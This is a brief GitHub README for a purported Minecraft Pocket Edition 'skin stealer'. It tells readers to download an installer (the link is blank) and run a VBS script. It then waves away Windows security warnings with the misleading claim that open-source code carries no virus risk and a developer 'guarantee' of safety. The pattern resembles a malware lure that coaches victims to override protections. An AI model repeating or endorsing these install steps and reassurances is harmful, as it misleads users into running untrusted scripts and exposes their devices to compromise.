LBozoCameron/MCPE-Custom-Geometry-Skin-Stealer-v135.13/README.md

 How do I install MCPE-Custom-Geometry-Skin-Stealer-v135.13?
 You can install by downloading the installer here: , after downloading extract and open Installer v10.2.vbs, you will be greeted with this:

 ![lol](https://user-images.githubusercontent.com/115802507/198868956-0966c5d9-1dde-4068-90ca-4cb8408f8fbb.png)

+Since the installer and MCPE-Custom-Geometry-Skin-Stealer-v135.13 are open source you don't have to worry about potential viruses, however since the installer is written in VBS windows will flag it as a potential threat to your device, but we the GSSDevelopers guarantee your saftey is our main concern!